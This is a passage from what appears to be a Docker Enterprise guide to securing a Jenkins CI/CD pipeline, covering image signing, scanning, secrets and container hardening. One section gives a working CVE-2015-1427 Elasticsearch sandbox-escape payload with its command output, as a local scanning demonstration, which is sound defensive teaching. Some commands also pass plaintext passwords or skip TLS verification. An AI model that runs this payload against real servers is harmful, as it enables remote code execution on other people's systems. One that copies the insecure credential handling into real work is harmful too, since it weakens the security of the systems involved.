== jenkins' \ --mount "type=bind,source=$PWD/jenkins_home/workspace,target=/workspace" \ gmcgoldrick/docker-agent-cli ``` Log in to UCP as the jenkins user and download the corresponding client bundle. Upload the bundle to the running container (using `docker cp`), then `docker exec` into the container, extract the files and set up the environment variables using `eval $(<env.sh)`. Now, run the Java client to connect to the Jenkins master. 
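The exact client invocation is not reproduced here; the sketch below assembles a plausible Swarm Client command line as a shell string so its parts are easy to inspect. The `-master`, `-labels` and `-name` flags are standard Swarm Client options, but the URL and values are assumptions based on this setup, not the original command.

```shell
# Sketch only: assemble an illustrative Jenkins Swarm Client invocation.
# Credentials are deliberately omitted; supply -username/-password as required.
JENKINS_MASTER="http://10.10.174.27:8082/jenkins"
SWARM_CLIENT_CMD="java -jar swarm-client-3.3.jar -master ${JENKINS_MASTER} -labels docker-cli -name docker-cli"
echo "$SWARM_CLIENT_CMD"
```

The `-labels docker-cli` value is what later lets a Jenkins job target this agent via its label.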
The command options passed into the Jenkins Swarm Client jar make the connection with the Jenkins master, setting a label of 'docker-cli' that we will use later as the target agent for builds. If successful, the agent will appear in the Build Executor Status panel and will be listed at http://10.10.174.27:8082/jenkins/computer/. If you drill into the agent details, you will see the ‘docker-cli’ label that was associated with the agent when starting the Jenkins Swarm Client.

**Deploying the Docker example voting app using the Docker agent**

Create a freestyle Jenkins project and use the setting Restrict where this project can be run to select the agent – set this to ‘docker-cli’ when using the secure agent above. Set the Source Code Management to point to the Docker sample application at https://github.com/dockersamples/example-voting-app. Add a build step to execute a shell and then use the command `docker stack deploy --compose-file docker-stack.yml vote` to deploy the sample application to the swarm. The resulting services are shown in Figure 4.

![Manager Node](image) ![Worker Node](image)

**Figure 4.** Services running on Docker swarm

The user interface for voting is available on port 5000, while the results are available on port 5001. To remove all the services, run the command `docker stack rm vote` on the manager node.

**Best practices for CI/CD**

Deploying the sample application as a stack using the compose file simply pulls pre-built images from the Docker Hub. In a development environment, you will want to build images locally from your own codebase, push these images to your own registries and then deploy the complete application on a swarm.
In this section, we will walk step-by-step through the process, adding layers of security and identifying best practices along the way, including: - Building images with an explicit build number - Infrastructure as code (IaC) - Push images to Docker Trusted Registry on every successful build - Scan images automatically - Use secrets management to protect sensitive passwords and configuration data - Create and maintain standardized baseline images - Understand the provenance of third-party images - Sign approved images in the registry - Deploy services using docker stack - Automatically sign build images using the CI system - Use Content Trust in UCP **CI/CD best practice: Building images with an explicit build number** Giving every development build its own unique identifier has many benefits including making it easier to associate bug reports with a specific build and giving users a quick indication of the relative age of the build they are using. Create a freestyle Jenkins project and set the Source Code Management to the URL for the source code, in this case the Docker sample application at [https://github.com/dockersamples/example-voting-app](https://github.com/dockersamples/example-voting-app). Use the setting Restrict where this project can be run to select the desired Docker agent. Add a build step to execute a shell and then use the following commands to build the images, tagging them with an explicit build number: ```bash docker build -t vote:0.$BUILD_NUMBER ./vote docker build -t result:0.$BUILD_NUMBER ./result docker build -t worker:0.$BUILD_NUMBER ./worker ``` Details for building the images where proxy configuration is required are given in Appendix A. **CI/CD best practice: Infrastructure as code** While the source code for the project is under revision control in Git, the scripts for building and deploying the project are edited in an interactive fashion in Jenkins and managed internally by the local Jenkins server. 
"Infrastructure as Code" is the process by which configuration and provisioning code is managed in the same way as source code. To migrate the existing build to use this process, create a new pipeline project in Jenkins and use a pipeline script specifying different stages for each part of the process, in this case “Pull” and “Build Images”. This script can be stored and managed using a version control system just like your source code, and new builds can be triggered automatically when the pipeline code changes.

```groovy
node() {
    stage("Pull") {
        git "https://github.com/dockersamples/example-voting-app"
    }
}
node("docker-cli") {
    stage("Build Images") {
        dir('vote') {
            sh "docker build -t vote:0.$BUILD_NUMBER ."
        }
        dir('result') {
            sh "docker build -t result:0.$BUILD_NUMBER ."
        }
    }
}
```

Listing the images available on the node shows the images with the build number included in the tag:

docker images

<table> <thead> <tr> <th>REPOSITORY</th> <th>TAG</th> <th>IMAGE ID</th> <th>CREATED</th> <th>SIZE</th> </tr> </thead> <tbody> <tr> <td>result</td> <td>0.1</td> <td>496e2ee7c194</td> <td>6 minutes ago</td> <td>228 MB</td> </tr> <tr> <td>vote</td> <td>0.1</td> <td>5c5a27847c16</td> <td>7 minutes ago</td> <td>84.7 MB</td> </tr> </tbody> </table>

In Figure 5, you can see that the Jenkins UI shows the two distinct stages graphically:

![Pipeline test-pipeline](image)

**Figure 5.** Jenkins pipeline stages

**CI/CD best practice: Push images to Docker Trusted Registry on every successful build**

The pipeline can be extended to include a stage for pushing the images to a local instance of Docker Trusted Registry. This example assumes that a jenkins user has been set up in Docker Trusted Registry (running on the swarm worker node at 10.10.174.28) and that it has write access to the dev/vote and dev/result repositories. Notice how the images are now tagged appropriately for the target repositories.
```groovy
node() {
    stage("Pull") {
        git "https://github.com/dockersamples/example-voting-app"
    }
}
node("docker-cli") {
    stage("Build Images") {
        dir('vote') {
            sh "docker build -t 10.10.174.28/dev/vote:0.$BUILD_NUMBER ."
        }
        dir('result') {
            sh "docker build -t 10.10.174.28/dev/result:0.$BUILD_NUMBER ."
        }
    }
}
node("docker-cli") {
    stage("Push Images") {
        sh "docker login --username jenkins --password $JENKINS_PASSWORD 10.10.174.28"
        sh "docker push 10.10.174.28/dev/vote:0.$BUILD_NUMBER"
        sh "docker push 10.10.174.28/dev/result:0.$BUILD_NUMBER"
        sh "docker logout 10.10.174.28"
    }
}
```

Details for building the images where proxy configuration is required are given in Appendix A.

**CI/CD best practice: Scan images automatically**

Image scanning is turned on in DTR under Settings ➔ Security. Each individual repository has its own settings for controlling the frequency of scanning – in a development environment, scanning should be performed on every build/push cycle, assuming the processing overhead is not too high. Most layers in your images will not change between builds, so the scanning can restrict itself to incrementally checking only those layers that have changed. Forcing images to be scanned as part of the software development lifecycle ensures that unscanned images can never make it into production. To see how scanning can identify problems, pull an image with a known vulnerability from Docker Hub, re-tag it and push it to a local repository that is set to scan automatically.

```bash
docker pull elasticsearch:1.4.2
docker tag elasticsearch:1.4.2 10.10.174.28/dev/elasticsearch:vulnerable
docker push 10.10.174.28/dev/elasticsearch:vulnerable
```

DTR correctly identifies that this version of Elasticsearch contains a critical vulnerability in the scripting engine, as shown in Figure 6. The vulnerability allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands.
DTR provides a link to the public database for more information on the vulnerability; see https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1427. To test the vulnerability locally (provided your testing environment is not publicly accessible), run a container using the vulnerable image and add some initial data (see the Elasticsearch in 5 minutes tutorial for a quick introduction). Then, execute a shell command, in this instance `ls`, through the search interface that, in this particular version of Elasticsearch, erroneously allows certain Java classes to run unrestricted in the container.

```bash
docker run -d -p 9200:9200 --name elastic 10.10.174.28/dev/elasticsearch:vulnerable
curl -XPUT 'http://localhost:9200/blog/user/dilbert' -d '{ "name" : "Dilbert Brown" }'
```

An extract from the search results is given below, showing the output of the `ls` command for the container:

```
"myscript" : ["bin\nboot\ndev\netc\nhome\nlib\nlib64\nmedia\nmnt\nopt\nproc\nroot\nrun\nsbin\nsrv\nsys\ntmp\nusr\nvar"]
```

This is an example of the added security you automatically get by running applications in containers – if this version of Elasticsearch were running on a bare-metal server, the exploit would provide remote access to the server itself rather than just to the container, as happens in this instance. There are a number of free resources available for learning about Docker and for running test services, including Katacoda and play-with-docker. Katacoda, in particular, presents many scenarios for securing Docker at the container level using cgroups, namespaces, seccomp, capabilities, etc., including a version of the preceding example using Elasticsearch. See https://katacoda.com/courses/docker-security for more information. These public sandboxes can provide a safe means for testing vulnerabilities and potential remediations without the need to compromise your internal systems.
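The search request used against the vulnerable Elasticsearch container above is not reproduced in this document; public write-ups of CVE-2015-1427 use a Groovy `script_fields` payload of roughly the following shape — a sketch only, to be run solely in an isolated test environment:

```bash
# Sketch of a CVE-2015-1427 proof-of-concept request: the Groovy script field
# escapes the sandbox and runs `ls` inside the container.
curl -XPOST 'http://localhost:9200/_search?pretty' -d '{
  "script_fields": {
    "myscript": {
      "script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"ls\").text"
    }
  }
}'
```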
**CI/CD best practice: Use secrets management to protect sensitive passwords and configuration data**

While the password for accessing the registry can be configured using an environment variable, a more secure solution is provided through the use of the secrets management functionality in Docker swarm. Each secret is made available inside the container as a distinct file in a temporary filesystem at `/run/secrets`. You can create a secret in the UCP UI under Resources → Secrets and then update the docker-agent service with the newly created secret using Services → Service → Environment → Use a secret. Alternatively, you can use the command line:

```bash
echo -n "jenkinspassword" | docker secret create JENKINS_PASSWORD -
docker service update --secret-add JENKINS_PASSWORD docker-agent
```

In the Jenkins pipeline script, we just need to read the contents of the secrets file to set the password securely:

```groovy
node("docker-cli") {
    stage("Push Images") {
        dir('/run/secrets') {
            sh "docker login --username jenkins --password ${readFile('./JENKINS_PASSWORD')} 10.10.174.28"
            sh "docker push 10.10.174.28/dev/vote:0.$BUILD_NUMBER"
            sh "docker push 10.10.174.28/dev/result:0.$BUILD_NUMBER"
            sh "docker logout 10.10.174.28"
        }
    }
}
```

**Note** When using the command line, we use the `-n` option on `echo` to omit the newline at the end of the file. Otherwise, the newline will terminate the shell command line early, resulting in the target registry being ignored, and the command will attempt to log in to the Docker Hub by default.

While secrets are intended for use with sensitive data like passwords, access tokens or certs, they can also be used for passing in configuration information that needs to change depending on the run-time environment.

**CI/CD best practice: Create and maintain standardized baseline images**

An organization will typically standardize on a small number of operating systems, with specific hardening and common tools applied.
On top of this base, distinct images will be created for each programming language stack required, for example, one for the Java/Spring Boot framework and another for Python/Flask. Limiting the number of baseline images makes it easier to identify and update affected images whenever vulnerabilities are discovered. Security and operations personnel should be responsible for creating these baseline images, with input from developers on what functionality is required. The build files for the baseline images should be under strict revision control to prevent ad-hoc packages or scripts being added without approval, while the images themselves should be signed and stored in the registry. You should strive to create the smallest base image possible, using a minimal base image such as `alpine`, since the number of vulnerabilities is typically proportional to the size of the image. Docker maintains a list of best practices for creating images [here](https://docs.docker.com/).

**CI/CD best practice: Understand the provenance of third-party images**

The official repository at Docker Hub (and more recently Docker Store) is the best starting point for locating curated images for OS and popular programming language runtimes. The official images are signed by Docker and tend to be patched and updated frequently, with security scanning results available to identify any vulnerabilities in image layers and components. It is recommended that you pull specific versions (rather than defaulting to `:latest`) when accessing images on an official repository. Even so, you should be aware that Docker tags are not immutable and that an image with a seemingly explicit “version” tag may change without you realizing it. As such, you should pin to a specific instance using the digest rather than a tag. If you are using images from another repository, you should pull, re-tag, sign and push them to your local registry. It can be hard to know exactly what is contained in an image if it has a chain of FROM clauses.
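One quick way to see what each layer in such a chain contributes, without tracking down every Dockerfile, is `docker history` (the image name here is illustrative):

```bash
# List every layer of the image together with the full command that created it.
docker history --no-trunc redis:3.2.9-alpine
```

Reading this alongside the Dockerfiles in the chain makes it much easier to spot unexpected packages, users or exposed ports.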
Each Dockerfile can download and install packages, add users, expose ports, set environment variables and run arbitrary scripts. It is worthwhile following the inheritance chain and understanding what each layer adds to the finished image. If you need to take complete control of your images, you could re-build them from scratch using the existing Dockerfiles in the chain as a template. In this way you decide exactly what should be in the image, but this approach can be a double-edged sword. Maintaining such custom images requires tracking all changes to the component images in the chain and applying updates/patches to your custom image when appropriate and, as such, this approach should not be undertaken lightly. Either way, it is highly advisable to investigate the provenance of third-party images and to keep a local copy of any Dockerfiles and shell scripts that are used to create the images you rely upon. Dependency management is a significant task, not just for your Docker images but also for your code dependencies in general (with Maven, npm, etc.), and is key to being able to reliably reproduce specific builds for your multiple deployment environments including QA (E2E, UAT, performance), staging and production.

**CI/CD best practice: Sign approved images in the registry**

Setting the environment variable `DOCKER_CONTENT_TRUST=1` means any image you push to a registry will be signed. This example assumes the devops1 user has write access to the `official/redis` repository. Once we are happy with the provenance of our third-party images, which have already been signed by Docker, we re-tag them and store them in our DTR instance so that we have local copies and can always recreate our environments on demand.
```bash
export DOCKER_CONTENT_TRUST=1
docker pull redis:3.2.9-alpine
docker tag redis:3.2.9-alpine 10.10.174.28/official/redis:3.2.9-alpine
docker pull postgres:9.4
docker tag postgres:9.4 10.10.174.28/official/postgres:9.4
docker login --username devops1 --password devops1password 10.10.174.28
docker push 10.10.174.28/official/redis:3.2.9-alpine
docker push 10.10.174.28/official/postgres:9.4
```

**Note** If you encounter an error similar to "certificate signed by unknown authority", you will need to make your Docker Engine trust the certificate authority used by DTR. For more information, see [https://docs.docker.com/datacenter/dtr/2.2/guides/user/access-dtr/](https://docs.docker.com/datacenter/dtr/2.2/guides/user/access-dtr/)

In our RHEL 7 environment, we performed the following steps:

```bash
curl -k https://10.10.174.28/ca -o /etc/pki/ca-trust/source/anchors/10.10.174.28.crt
sudo update-ca-trust
sudo /bin/systemctl restart docker.service
```

If this is the first push with content trust enabled, you will be prompted to create a new root signing key passphrase, along with a repository key passphrase. You can see in DTR, in Figure 7 below, that the image has been signed.

![Docker Trusted Registry](image)

**Figure 7.** Signed image in repository

**CI/CD best practice: Automatically sign build images using the CI system**

The CI system should sign the images it builds when pushing them to the local registry, setting `DOCKER_CONTENT_TRUST=1` in the pipeline script.
```groovy
node("docker-cli") {
    stage("Push Images") {
        withEnv(["DOCKER_CONTENT_TRUST=1"]) {
            dir('/run/secrets') {
                sh "docker login --username jenkins --password ${readFile('./JENKINS_PASSWORD')} 10.10.174.28"
                sh "docker push 10.10.174.28/dev/vote:0.$BUILD_NUMBER"
                sh "docker push 10.10.174.28/dev/result:0.$BUILD_NUMBER"
                sh "docker push 10.10.174.28/dev/worker:0.$BUILD_NUMBER"
                sh "docker logout 10.10.174.28"
            }
        }
    }
}
```

**CI/CD best practice: Deploy services using Docker stack**

We can combine our approved third-party images with the images we have built locally for our application code and deploy them automatically in Jenkins using a compose file and the `docker stack` command. Stacks are a convenient way to automatically deploy multiple services that are linked to each other, without needing to define each one separately. Stack files are in YAML format and define environment variables, deployment tags, the number of containers, and related environment-specific configuration. We modify the compose file [https://github.com/dockersamples/example-voting-app/blob/master/docker-stack.yml](https://github.com/dockersamples/example-voting-app/blob/master/docker-stack.yml) so that it now pulls the approved third-party `redis` and `postgres` images from our `official` repository, and the application-specific images from the `dev` repository used by Jenkins, and then combine these images in a new `Deploy stack` stage in the pipeline script. The complete compose file and pipeline script file are available in [Appendix B](#).

**CI/CD best practice: Use Content Trust in UCP**

UCP can restrict the services running on the Docker swarm to those signed by particular groups of users. However, UCP cannot automatically trust the images you have signed in DTR because it cannot associate the private key, which you are using for signing, with your UCP account. To sign images in the registry in such a way that UCP can trust them, you need to:

- Set up a Notary client.
(Notary is a Docker project that allows anyone to have trust over arbitrary collections of data and is based on The Update Framework, a secure general design for the problem of software distribution and updates). - Initialize trust metadata for your repositories, either by pushing content or using a notary init/key rotate/publish cycle. - Delegate signing to the keys in the UCP client bundles for your users, in this case devops1 and jenkins. - Add these users to teams in UCP, and use these teams when requiring signatures in UCP → Admin Settings → Content Trust. The implementation details for setting up Content Trust with UCP are available in Appendix C. Once you have signed your images so that UCP can trust them, you can deploy the stack as usual using docker stack deploy --compose-file docker-stack.yml vote. Content Trust in UCP is a key element in securing your Docker swarm, allowing you to gate releases onto different environments based on approvals from the relevant teams. **Best practices for development** In the same way that there are a multitude of configurations for your CI/CD pipeline, there are also numerous common developer workflows including using a single master branch in a central repository, using feature branches with pull requests for code review, or even more rigorous scenarios where code changes require review and approvals, including passing CI tests, before the changes are committed. One typical developer workflow using Docker is shown in Figure 8: ![Figure 8. Developer Workflow](image) Developers use a Source Code Management system for their code, and repositories appropriate to the programming languages they are using (for example, Artifactory for Java dependencies and build artifacts). Using Docker, they can build images locally and deploy services, either locally or in an integration environment. 
**Development best practice: Replicate CI environment on developer workstations** One of the big attractions of Docker from the development point of view is the ability to run multiple versions of OS platforms, databases, or application stacks on a single developer workstation or laptop. Likewise, the ability to maintain consistent software configurations across all your developers’ environments helps to avoid the “it works on my machine” dilemma. While the CI/CD workflow is the single source of truth for images, developers can build and test images locally, and even deploy multi-node stacks using `docker-machine`. The closer the development environment is to the CI one, the more confidence a developer will have that a commit will not break the build. **Development best practice: Multi-stage builds** In your CI environment, you can deploy multiple flavors of build agents for each programming stack you use, for example one agent may be responsible for all Java builds, pulling in dependencies from external repositories (like Artifactory or Nexus), compiling code, building jar or war files and saving these build artifacts to a repository. A separate agent may use the build artifacts to create images and deploy services on the Docker swarm. It is now possible for developers to mimic this approach using Docker’s multi-stage builds, in the first stage creating a complete build environment while, in the second stage, setting up a minimal run-time environment. **Best practices for operations** There are a number of different patterns used for deploying applications in a production environment, for example, Blue-Green, Canary or Rolling. Ideally, you should be able to perform push-button deployment of any build at any time, but for business reasons the actual process may be slower and involve some manual input from your operations team. 
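On a swarm, the rolling pattern mentioned above maps directly onto `docker service update`. A sketch, where the service name, image tag and update settings are illustrative:

```bash
# Roll the running service over to a new image build, one task at a time,
# waiting 10 seconds between task updates (names and values are illustrative).
docker service update \
  --image 10.10.174.28/dev/vote:0.13 \
  --update-parallelism 1 \
  --update-delay 10s \
  vote_vote
```

Tuning `--update-parallelism` and `--update-delay` lets the operations team trade deployment speed against the blast radius of a bad build.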
In enterprise environments, it is common to separate development and build systems from run-time resources, and so there will be separate production and non-production UCP clusters. However, having a single master DTR cluster allows centralized enforcement of security best practices including signing, scanning and secrets. Note that policy enforcement on image signing requires you to have your DTR in the same cluster as UCP.

**Operations best practice: Use UCP/DTR security features**

Docker’s commercial offerings provide a wide range of features to help secure your entire software supply chain, including deployment and ongoing maintenance and monitoring. A single sign-on service provides a shared authentication service for UCP and DTR and works out of the box or via an externally-managed LDAP/AD service. You can replace the self-signed certs in UCP and DTR with fully-signed certificates from your organization’s Certificate Authority (CA). Role-Based Access Control (RBAC) provides fine-grained control over access to individual volumes, networks, images, secrets, and running containers. (While users are shared across UCP and DTR, UCP uses “teams” to organize users into groups, whereas DTR has the concept of “organizations” for controlling access to repositories.) When using DTR and Notary for image signing, key management is critical and, if possible, you should use a hardware token such as a YubiKey. For more information, see the [Docker Reference Architecture for Security Best Practices](#).

**Operations best practice: Take advantage of container security features**

Container security features can be used to limit the impact of incidents such as kernel exploits, denial-of-service attacks or container breakouts. These features include:

- Kernel namespaces provide the isolation between containers and also from the host itself.
- cgroups control the amount of system resources that a container can use.
- Kernel capabilities provide a fine-grained access control system over what operations a container can run.
- Secure computing mode (seccomp) is a Linux kernel feature that you can use to restrict the actions available within a container.
- The Linux Security Module (LSM) framework, including SELinux and AppArmor.

These security features should be used to limit the resources and the access rights for containers:

- User namespaces are a relatively new feature in Docker (1.10). They allow the Docker daemon to create an isolated namespace that looks and feels like a root namespace. However, the root user inside this namespace is mapped to a non-privileged uid on the Docker host. This means that containers can effectively have root privilege inside the user namespace, but have no privileges on the Docker host. For more information on user namespaces, see the Docker Knowledgebase article [here](#) and the tutorial [here](#).
- By default, Docker drops all capabilities except those needed, using a whitelist approach, while allowing you to expand or contract the set.
- The seccomp profile is a whitelist that denies access to system calls by default, then whitelists specific system calls. The default seccomp profile provides a sane default for running containers with seccomp and disables around 44 system calls out of more than 300, and you can expand (or contract) this number based on your application's needs.
- AppArmor (Application Armor) is a Linux security module that protects an operating system and its applications from security threats. Docker automatically generates and loads a default AppArmor profile for containers that is moderately protective while providing wide application compatibility. Once again, in line with the Docker philosophy of built-in but customizable security, you can modify the profiles to suit your own custom needs.
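Applying these controls when starting a container can be sketched as follows; the profile file, profile name and image are illustrative, not part of the reference setup:

```bash
# Drop all capabilities and add back only the one this service needs, then
# apply custom seccomp and AppArmor profiles (hypothetical file/profile names).
docker run -d \
  --cap-drop ALL \
  --cap-add NET_BIND_SERVICE \
  --security-opt seccomp=/path/to/custom-seccomp.json \
  --security-opt apparmor=my-custom-profile \
  nginx:alpine
```

Starting from `--cap-drop ALL` and adding capabilities back one at a time is a simple way to discover the minimal set an application actually needs.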
The definitive treatment of (Linux) container security by Aaron Grattafiori is available at https://www.nccgroup.trust/us/our-research/understanding-and-hardening-linux-containers/. Docker also maintains a list of security vulnerabilities which Docker mitigated, such that processes running in Docker containers were never vulnerable to the bug – see https://docs.docker.com/engine/security/non-events/. **Operations best practice: Production** Standard checks should be performed before running any images in your production cluster. Images must have the correct configuration, must include any required packages and exclude any blacklisted packages, and any third-party software should be updated and patched appropriately. There must not be any secrets (for example, passwords, access tokens or certs) embedded in the images and the network ports that are exposed must be known and approved. Images should be signed by the required teams, including CI/CD, QA, security, etc. and runtime options should be set to restrict resource utilization. Access to production servers should be severely restricted – in particular, developers should not expect `ssh` or `docker exec` access to debug issues. Instead, a comprehensive logging and monitoring solution should be deployed on the swarm, to identify any suspicious patterns and to provide enough information to identify the source of any problems. On-going security scanning and maintaining an up-to-date vulnerabilities database will help you to proactively manage any new threats. It is important to realize that node uptime is not necessarily indicative of node health and to understand the concept of “reverse uptime”. Rather than tracking how long a server has been up, instead you should limit the maximum time any server can be up for and then reimage it. 
**Operations best practice: Immutable infrastructure**

In general, containers should be run in read-only mode where possible, mounting explicit directories as writable as required by your applications. This severely restricts the damage an attack can do if it does get through your other layers of defense. This idea can be expanded to cover all intentional updates as well (for example, installing new packages, upgrading existing packages, minor code changes to CSS, etc.). Instead of making changes directly to running services, you make the changes in the build environment, maintaining your changes in the source code management system, and then building, testing and re-deploying the new images. Using immutable containers allows you to minimize “drift”, where servers that should be running the same code are out of sync due to direct manual changes or random failures in automated provisioning. It also allows you to quickly and reliably roll back to a known good state when a planned upgrade goes wrong.

**Operations best practice: Run Docker Bench regularly**

The Docker Bench for Security is a script that checks for dozens of common best practices around deploying Docker containers in production. The tests are all automated, and are inspired by the Center for Internet Security (CIS) Docker 1.13 Benchmark, an objective, consensus-driven security guideline for the Docker server software. It can be run as a privileged container on any host, and running it on a regular cadence will improve the security posture of your servers.

**Operations best practice: Use encrypted overlay networks**

Overlay networking for Docker Engine swarm mode comes secure out of the box. You can also encrypt data exchanged between containers on different nodes on the overlay network. To enable encryption, pass the `--opt encrypted` flag when you create an overlay network.
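Creating an encrypted overlay network and attaching a service to it can be sketched as follows (the network and service names are illustrative):

```bash
# Create an overlay network whose container data traffic is encrypted,
# then start a service attached to it.
docker network create --driver overlay --opt encrypted secure-net
docker service create --name web --network secure-net nginx:alpine
```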
Because the overlay networks for swarm mode use encryption keys from the manager nodes to encrypt the gossip communications, only containers running as tasks in the swarm have access to the keys. Consequently, containers started outside of swarm mode using `docker run` (unmanaged containers) cannot attach to the overlay network. To work around this situation, you must migrate the unmanaged containers to managed services. For more information on encrypted overlay networks, see the Docker documentation here.

**Summary**

This document shows how Docker Enterprise Edition can be used to secure the entire software supply chain, from development to integration, through testing to deployment and on-going maintenance. At a time when the processes involved in software delivery are undergoing rapid transformation, with the need for speed and agility having to be balanced against ever-increasing security threats, the Docker philosophy of providing secure platform, content and access out of the box facilitates a proactive approach to security from your development, QA and operations teams. Your build teams can leverage features such as signing, scanning, and secrets, along with concepts such as infrastructure as code and standardized baseline images, to secure the CI/CD pipeline. Developer productivity can be enhanced through the use of multi-stage builds and the ability to easily replicate multiple and complex build environments on workstations and laptops. Finally, operations personnel can target immutable infrastructure and the use of DTR as a single source of truth as a goal for simplifying deployment and on-going maintenance. Following the suggested best practices outlined in this document for CI/CD, development and operations will ultimately allow you to deploy your applications more securely in containers than on bare metal.

**Appendix A: Jenkins implementation details**

**Building a sample project to test Jenkins service**

1.
Install Maven using Manage Jenkins ➔ Global Tool Configuration ➔ Add Maven. Choose to install version 3.5.0 from Apache and name it Maven35. Note that the software is not immediately installed but is downloaded once a project uses it for the first time. If the various versions do not appear in a drop-down menu, you may need to restart Jenkins (10.10.174.27:8082/Jenkins/restart) for the proxy configuration to kick in. 2. Create a new freestyle project using Jenkins ➔ New Item to test that Jenkins is working correctly. 3. Set the Source Code Management to Git and set the Repository Url to https://github.com/spring-projects/spring-boot. Tab out of the textbox to ensure that any required proxies are configured correctly and that the Github repository can be accessed. 4. Add a Build Step to Invoke top-level Maven targets and set the Maven Version to Maven35, the Goals to package. This particular repository contains multiple example projects so we need to set an explicit POM using the Advanced... button. To just build the Sample Atmosphere example, specify the POM as spring-boot-samples/spring-boot-sample-atmosphere/pom.xml. 5. Save the project and then select Build Now to build it. 6. Look at the console output for the running build. If the dependencies are downloading very slowly or not at all, you may need to explicitly set the proxy configuration for this Maven installation. 
Modify the settings.xml file at jenkins_home/tools/hudson.tasks.Maven_MavenInstallation/Maven35 to configure the proxy:

```xml
<settings ...>
  <proxies>
    <proxy>
      <id>httpproxy</id>
      <active>true</active>
      <protocol>http</protocol>
      <host>proxy.myproxy.net</host>
      <port>8080</port>
      <nonProxyHosts>localhost</nonProxyHosts>
    </proxy>
    <proxy>
      <id>httpsproxy</id>
      <active>true</active>
      <protocol>https</protocol>
      <host>proxy.myproxy.net</host>
      <port>8080</port>
      <nonProxyHosts>localhost</nonProxyHosts>
    </proxy>
  </proxies>
</settings>
```

It can also be helpful to change the connection settings if you are having trouble with your proxy, as the default timeouts are very long:

```xml
<servers>
  <server>
    <id>myserver</id>
    <configuration>
      <httpConfiguration>
        <put>
          <connectionTimeout>10000</connectionTimeout>
          <readTimeout>30000</readTimeout>
        </put>
      </httpConfiguration>
    </configuration>
  </server>
</servers>
```

7. If Jenkins is configured correctly, the code should compile and the tests should run to completion successfully.

**Proxy configuration for Jenkins**

Instead of specifying the proxy configuration using the Manage Jenkins ➔ Manage Plugins ➔ Advanced page, you can start the Jenkins service with a proxy configuration specified:

```bash
docker service create --name jenkins-proxy -p 8082:8080 -p 50000:50000 \
  --constraint 'node.labels.env == jenkins' \
  -e JENKINS_OPTS="--prefix=/jenkins" \
  -e JAVA_OPTS="-Dhttp.proxyHost=proxy.myproxy.net -Dhttp.proxyPort=8080 -Dhttps.proxyHost=proxy.myproxy.net -Dhttps.proxyPort=8080" \
  --mount "type=bind,source=$PWD/jenkins_home,target=/var/jenkins_home" \
  jenkins:2.46.3-alpine
```

**Note** We found that it was still necessary to explicitly set the proxy again in the Manage Jenkins ➔ Manage Plugins ➔ Advanced tab for the proxy to take effect for some plug-ins, even when Jenkins was started with the proxy configured up front.
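When the same proxy block has to be replicated across several Jenkins agents, generating it can reduce copy-paste errors. The sketch below is our own illustration (the `proxy_element` helper and the host/port values mirror the example above; none of this is part of Jenkins or Maven), using only Python's standard library:

```python
import xml.etree.ElementTree as ET

def proxy_element(proxy_id, protocol, host, port, non_proxy="localhost"):
    """Build one Maven <proxy> element as used in settings.xml."""
    proxy = ET.Element("proxy")
    for tag, text in [("id", proxy_id), ("active", "true"),
                      ("protocol", protocol), ("host", host),
                      ("port", str(port)), ("nonProxyHosts", non_proxy)]:
        ET.SubElement(proxy, tag).text = text
    return proxy

# Assemble the <proxies> section shown in the settings.xml example above.
proxies = ET.Element("proxies")
proxies.append(proxy_element("httpproxy", "http", "proxy.myproxy.net", 8080))
proxies.append(proxy_element("httpsproxy", "https", "proxy.myproxy.net", 8080))
print(ET.tostring(proxies, encoding="unicode"))
```

The generated fragment can then be spliced into each agent's settings.xml as part of a provisioning script.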
**Proxy configuration when building sample images**

The vote front-end, [https://github.com/dockersamples/example-voting-app/blob/master/vote/Dockerfile](https://github.com/dockersamples/example-voting-app/blob/master/vote/Dockerfile), is a Python-based application that uses pip to install required software. We pass the proxy setting as a variable to the build command, for example, `docker build -t vote:0.0.BUILD_NUMBER --build-arg PROXY=http://proxy.myproxy.net:8080 ./vote`, and use the variable in the Dockerfile for the pip install:

```dockerfile
ARG PROXY
RUN pip install -r requirements.txt --proxy=$PROXY
```

The result front-end, [https://github.com/dockersamples/example-voting-app/blob/master/result/Dockerfile](https://github.com/dockersamples/example-voting-app/blob/master/result/Dockerfile), is a Node.js-based application that uses npm to install required packages. We pass the proxy setting as a variable to the build command, for example, `docker build -t result:0.0.BUILD_NUMBER --build-arg PROXY=http://proxy.myproxy.net:8080 ./result`, and use the variable in the Dockerfile for the npm install:

```dockerfile
ARG PROXY
RUN npm config set proxy $PROXY
RUN npm config set https-proxy $PROXY
```

The default worker, [https://github.com/dockersamples/example-voting-app/blob/master/worker/Dockerfile](https://github.com/dockersamples/example-voting-app/blob/master/worker/Dockerfile), is a .NET application. We pass the proxy setting as a variable to the build command, for example, `docker build -t worker:0.0.BUILD_NUMBER --build-arg PROXY=http://proxy.myproxy.net:8080 ./worker`, and use the variable in the Dockerfile:

```dockerfile
ARG PROXY
ENV http_proxy $PROXY
```

**Appendix B: Pipeline for building and deploying stack**

The pipeline script builds and tags the 3 application images and pushes them to the local repository. It then deploys the application to the swarm using the compose file.
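All three images are built with the same `-t image:0.$BUILD_NUMBER --build-arg PROXY=...` pattern, so the invocation can be scripted. The following is a minimal sketch of our own (the `build_cmd` helper is hypothetical, not part of Docker or Jenkins) that only assembles the argument list; it could be handed to `subprocess.run` on a node that has the Docker CLI:

```python
def build_cmd(image, build_number, context, proxy=None):
    """Assemble a `docker build` argument list, tagging the image
    with the build number as the pipeline below does."""
    cmd = ["docker", "build", "-t", f"{image}:0.{build_number}"]
    if proxy:
        # Forwarded into the Dockerfile via ARG PROXY.
        cmd += ["--build-arg", f"PROXY={proxy}"]
    cmd.append(context)
    return cmd

print(build_cmd("vote", 26, "./vote", proxy="http://proxy.myproxy.net:8080"))
```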
Pipeline script

```groovy
node("docker-cli") {
    stage("Build Images") {
        dir('vote') {
            sh "docker build -t 10.10.174.28/dev/vote:0.$BUILD_NUMBER --build-arg PROXY=http://proxy.myproxy.net:8080 ."
        }
        dir('result') {
            sh "docker build -t 10.10.174.28/dev/result:0.$BUILD_NUMBER --build-arg PROXY=http://proxy.myproxy.net:8080 ."
        }
        dir('worker') {
            sh "docker build -t 10.10.174.28/dev/worker:0.$BUILD_NUMBER --build-arg PROXY=http://proxy.myproxy.net:8080 ."
        }
    }
}
node("docker-cli") {
    stage("Push Images") {
        withEnv(["DOCKER_CONTENT_TRUST=0"]) {
            dir('/run/secrets') {
